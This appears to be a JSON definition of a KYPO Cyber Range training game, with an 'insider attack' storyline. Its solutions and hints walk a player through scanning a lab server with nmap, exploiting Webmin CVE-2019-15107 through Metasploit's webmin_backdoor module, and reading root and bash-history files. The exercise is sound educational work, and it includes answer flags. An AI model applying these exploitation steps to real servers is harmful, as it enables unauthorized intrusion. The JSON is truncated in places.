"description":"Insider-attack modification of Locust 3302.",
"prerequisites":[],
"outcomes":["You will learn how to scan a server, how to find out possible vulnerabilities and how to exploit them."],
"state":"UNRELEASED",
"show_stepper_bar":true,
"levels":[{
"title":"Questionnaire",
"level_type":"INFO_LEVEL",
"order":0,
"estimated_duration":0,
"minimal_possible_solve_time":null,
"content":"Before you start, please fill out this **<a href=\"https://forms.gle/kcFbczNhGKnjXkeEA\" target=\"_blank\">Questionnaire</a>**.\n\nYour identification is required in the form but is used only for pairing the data from KYPO Cyber Range and Google Form questionnaire answers. We will fully **anonymize** the collected data right after merging them.\n\nThank you for your participation."
},{
"title":"Introduction",
"level_type":"INFO_LEVEL",
"order":1,
"estimated_duration":0,
"minimal_possible_solve_time":null,
"content":"# General information: please read carefully\n\n* The solution of a level **will be required** in the further levels. Do not try to skip ahead. If you reveal a solution to the level, complete all the steps, you will need them later.\n* If you get stuck during the game, feel free to use Google.\n* This game is for educational purposes only.\n* The game contains four tasks. The estimated playing time is approximately 60 minutes.\n\n# Storyline intro\n\nYou work in the IT company Thasonium where you deal with many important business data. Server administrator Eve was fired the previous week. However, she managed to change the credentials to the server with essential data before she left the company, leaving the server inaccessible. Your goal is to get into that server and recover the company data stored there."
},{
"title":"Check remote services of the server",
"level_type":"TRAINING_LEVEL",
"order":2,
"estimated_duration":15,
"minimal_possible_solve_time":null,
"answer":"Webmin",
"answer_variable_name":null,
"content":"# Information about your machine\n\nYour computer named \"employee\" is running [Kali Linux](https://www.kali.org/) and is connected to the company network. Credentials to your machine are:\n* `username: kali`\n* `password: kali`\n\nAll the tools you need are already installed. See if the server with IP address `172.18.1.5` offers some network services that could be vulnerable and then used for remote access. \n\nTo connect to your computer, right-click on it and open the terminal,\n\n**Flag:** the name of a possibly vulnerable service running on an open port. The flag will be listed in parentheses followed by `httpd`, like this: `(Flag httpd)`.",
"solution":"1. Open the terminal and run the command `nmap -sV 172.18.1.5`\n2. The highest shown port is `10000` running the **${ANSWER}** service -- this is the flag.\n ",
"solution_penalized":true,
"hints":[{
"title":"I found the flag, but the system does not accept it.",
"content":"Be accurate. The letters' case matters. The flag is case-sensitive.",
"hint_penalty":1,
"order":0
},{
"title":"What tool to use? (more detailed hint)",
"content":"Use **nmap** to scan the server. Type `nmap --help` for some info or `man nmap` for a more comprehensive manual.",
"hint_penalty":2,
"order":3
},{
"title":"Hint for the parameters of the tool",
"content":"Check out in the documentation what the `-sV` option does. If you want to know the details of only a specific service, combine it with the `-p port_number` parameter.",
"hint_penalty":4,
"order":2
},{
"title":"What tool to use? (less detailed hint)",
"content":"The tool to scan IP addresses is already installed on your machine and is commonly used to scan servers and their services.",
"hint_penalty":1,
"order":1
}],
"incorrect_answer_limit":15,
"attachments":[],
"max_score":10,
"variant_answers":false,
"reference_solution":[{
"state_name":"scanned_ip",
"prereq_state":[],
"cmd":"nmap -sV 172.18.1.5",
"cmd_type":"bash-command",
"cmd_regex":"nmap -sV 172.18.1.5",
"optional":false
}],
"mitre_techniques":[],
"expected_commands":[],
"commands_required":false
},{
"title":" Identify a vulnerability to get remote access",
"level_type":"TRAINING_LEVEL",
"order":3,
"estimated_duration":10,
"minimal_possible_solve_time":null,
"answer":"CVE-2019-15107",
"answer_variable_name":null,
"content":"Well done! Now you know what applications are running on the server (`172.18.1.5`). Fortunately, the server is a web server. The Webmin running on port 10000 is often vulnerable. Choose the right vulnerability to exploit. (Look for a critical vulnerability from the past few years.)\n\n**Flag:** CVE code of the vulnerability in the format **CVE-Y-X**, where Y is the year and X is a 4- or 5-digit number.",
"solution":"In the previous level, you found that Webmin is running on port 10000.\n\nThere are several ways to find a vulnerability of Webmin:\n* google \"Webmin exploit\" -- the correct vulnerability is on the first page\n* in the terminal, run `searchsploit webmin`\n* open Metasploit console and search for Webmin vulnerabilities\n ```\n kali@employee:~# msfconsole\n msf6 > search webmin\n ```\n\nThe vulnerability you are looking for is **${ANSWER}**. It's unauthenticated and from the past few years.\n\nSee more at https://cve.mitre.org/cgi-bin/cvename.cgi?name=${ANSWER}",
"solution_penalized":true,
"hints":[{
"title":"What to look for and where",
"content":"CVE, short for Common Vulnerabilities and Exposures, is a list of publicly disclosed computer security flaws. Each flaw has a unique identifier. See https://cve.mitre.org/\n\nUse [exploit-db.com](https://www.exploit-db.com/) or the Metasploit tool to find CVEs associated with Webmin.\n\nLook for relatively recent, unauthenticated, and critical exploits.",
"hint_penalty":4,
"order":0
},{
"title":"How to start",
"content":"Using `nmap` with the `-sV` flag, you can discover (if you haven't already) that **Webmin** is running on port 10000. However, its CVE code will not be directly in the console with the `nmap` output. So, google the vulnerabilities of Webmin (do not search for the vulnerabilities of port 10000, that number is arbitrary), or use `msfconsole` to find out available exploits for Webmin backdoor vulnerabilities.",
"hint_penalty":2,
"order":1
}],
"incorrect_answer_limit":10,
"attachments":[],
"max_score":15,
"variant_answers":false,
"reference_solution":[{
"state_name":"vulnerability_identified",
"prereq_state":["metasploit__opened"],
"cmd":"search webmin",
"cmd_type":"msf-command",
"cmd_regex":"search webmin",
"optional":true
},{
"state_name":"metasploit__opened",
"prereq_state":["scanned_ip"],
"cmd":"msfconsole",
"cmd_type":"bash-command",
"cmd_regex":"msfconsole",
"optional":true
}],
"mitre_techniques":[],
"expected_commands":[],
"commands_required":false
},{
"title":"Exploit the vulnerability and then get into the server",
"level_type":"TRAINING_LEVEL",
"order":4,
"estimated_duration":20,
"minimal_possible_solve_time":null,
"answer":"25790",
"answer_variable_name":null,
"content":"The vulnerability CVE-2019-15107 seems promising. Exploit it, gain access to the server (`172.18.1.5`), and **stay connected to it**.\n\n**Flag format:** a five-digit number located in a file in the `/root/` directory on the server.\n\nNote: The exploit contains a bug. If the remote shell does not function properly after you gain access, type `bash`. It will run, although it will appear waiting (just a flashing underscore character).",
"solution":"```\n1. kali@employee:~# msfconsole\n2. msf6 > search webmin \n3. msf6 > use exploit/linux/http/webmin_backdoor\n4. msf6 > show options\n5. msf6 > set RHOST 172.18.1.5\n6. msf6 > set RPORT 10000\n7. msf6 > set LHOST 10.1.135.83\n8. msf6 > check\n```\n\nIf Metasploit reports the target as not vulnerable, try to proceed anyway.\n\n```\n9. msf6 > exploit (or run, this is a synonym)\n```\n\nAfter this, a new SSH session to the server is created. If the remote shell does not function properly, type `bash`. It will run, although it will appear waiting (just a flashing underscore character), and you can continue with step 10. If it does not work, switch to root using `su root` and continue with step 10.\n\n```\n10. cd /root/\n11. cat WARNING-READ-ME.txt\n```\n\nThe flag is **${ANSWER}**.",
"solution_penalized":true,
"hints":[{
"title":"How to find the correct exploit?",
"content":"There is a `search` command in Metasploit (msfconsole) to find the correct exploit. Additional flags for the `search` command can be useful!\n\nTo use the exploit, run `use [path of the exploit]`. It is installed in the `exploit/unix/` folder (not in `exploit/linux` as you may find in some online tutorials).",
"hint_penalty":2,
"order":1
},{
"title":"How to apply the exploit? (less detailed hint)",
"content":"First, use the `use path-to-exploit` command to activate the exploit. Then, each activated exploit has its options -- parameters that you must set before you run it. Type `show options` to display them. Set the remote server IP and your local IP. Then run the exploit using the command `exploit` or `run`.",
"hint_penalty":1,
"order":4
},{
"title":"What tool to use?",
"content":"The tool you are looking for is `msfconsole` called **Metasploit**. It's a command-line tool. Run it and use a correct exploit.\n\nExploits in Metasploit are ready-made scripts that automatically attack a vulnerability. They save you time during penetration testing: you do not need to program or download custom exploits, but you simply use existing attack scripts that someone created for the common vulnerabilities.\n\nIf you have never heard of Metasploit, check out the tutorial at https://www.offensive-security.com/metasploit-unleashed/metasploit-fundamentals/",
"hint_penalty":2,
"order":0
},{
"title":"How to apply the exploit? (even more detailed hint)",
"content":"First, use the `use exploit/unix/webapp/webmin_backdoor` command to activate the exploit. Then, each activated exploit has its options -- parameters that you must set after you activated the exploit but before you run it. \n\n* `RHOSTS` needs to be set to the IP address of the victim, i.e., `set RHOSTS 172.18.1.5`.\n* `RPORT` needs to be set to desired port number, i.e., 10000.\n* `LHOST` needs to be set to the machine that initiates the exploit (you), i.e., `set LHOST 10.1.135.83`.\n\nThen run the exploit using the command `exploit` or `run`.",
"hint_penalty":5,
"order":6
},{
"title":"Which file on the server contains the flag?",
"content":"`/root/WARNING-READ-ME.txt`",
"hint_penalty":1,
"order":7
},{
"title":"How to apply the exploit? (more detailed hint)",
"content":"First, use the `use path-to-exploit` command to activate the exploit. Then, each activated exploit has its options -- parameters that you must set after you activated the exploit but before you run it. Parameters for this exploit are `RHOSTS` and `LHOST`. Set them to correct values by using `set parameter value`. Then run the exploit using the command `exploit` or `run`.",
"hint_penalty":3,
"order":5
},{
"title":"How to show content of a file?",
"content":"Simply `cat path/to/the/file`",
"hint_penalty":1,
"order":8
},{
"title":"Which exploit should I use exactly? (more detailed hint)",
"content":"The name you are looking for is `exploit/unix/webapp/webmin_backdoor`. You can search it by `search webmin` in the Metasploit tool. Use the `use exploit/linux/http/webmin_backdoor` command to activate the exploit. Nevertheless, the exploit is still not applied after that. You have to make some additional steps to apply the exploit on the server.",
"hint_penalty":3,
"order":3
},{
"title":"Which exploit should I use? (less detailed hint)",
"content":"The name of the exploit is intuitive. It is a backdoor that includes the name of the service in its name. You can search it easily in the `msfconsole`.",
"title":"Find a computer possibly storing a copy of the company data",
"level_type":"TRAINING_LEVEL",
"order":5,
"estimated_duration":10,
"minimal_possible_solve_time":null,
"answer":"10.1.17.4",
"answer_variable_name":null,
"content":"Well done, you got inside the server! The bad news is that Eve deleted the data from the server. However, we believe she made a copy so that she could extort money from our company later on.\n\nFortunately, the server is physically well protected in a rack. There is no way of connecting a flash disc or other storage devices directly to the server. The only possible way of backing up the data is by copying them to a remote computer. Find the IP address of the computer to which Eve could have moved the company data. \n\n**Flag:** IP address of the target computer.",
"solution":"1. run `ls -a /home/eve` on the previously exploited server\n2. display `.bash_history` file with `less .bash_history`\n3. `scp` command is used for copying files to a remote computer, the IP address is **${ANSWER}**\n",
"solution_penalized":true,
"hints":[{
"title":"How to start",
"content":"The fired employee had to connect to another computer from this host when they copied the data. Perhaps, some traces of the connection could remain in their homes located in the `/home/` directory.",
"hint_penalty":4,
"order":0
},{
"title":"What remote activity to look for",
"content":"The `scp` command is often used to copy data remotely.",
"hint_penalty":3,
"order":2
},{
"title":"Where exactly to look for the flag",
"content":"Try to explore a `.bash_history` file and choose the correct IP address. Don't guess!",
"hint_penalty":6,
"order":1
}],
"incorrect_answer_limit":10,
"attachments":[],
"max_score":20,
"variant_answers":false,
"reference_solution":[{
"state_name":"found_right_file",
"prereq_state":["found_hidden_flag"],
"cmd":"ls -a /home/eve",
"cmd_type":"bash-command",
"cmd_regex":"ls .*eve",
"optional":false
},{
"state_name":"found_ip",
"prereq_state":["found_right_file"],
"cmd":"less .bash_history",
"cmd_type":"bash-command",
"cmd_regex":"less|cat .*\\.bash_history",
"optional":false
}],
"mitre_techniques":[],
"expected_commands":[],
"commands_required":false
},{
"title":"Congratulations",
"level_type":"INFO_LEVEL",
"order":6,
"estimated_duration":0,
"minimal_possible_solve_time":null,
"content":"Excellent! We have sent your colleague to check the data stored on a remote \"backup\" computer with IP 10.1.17.4, which you found. He reported he had found the data deleted from our server by Eve. Thank you for your work. The reward will not pass you by.\n\n---\n\nCredits: [storyline inspiration](https://en.wikipedia.org/wiki/Cicada_3301)"
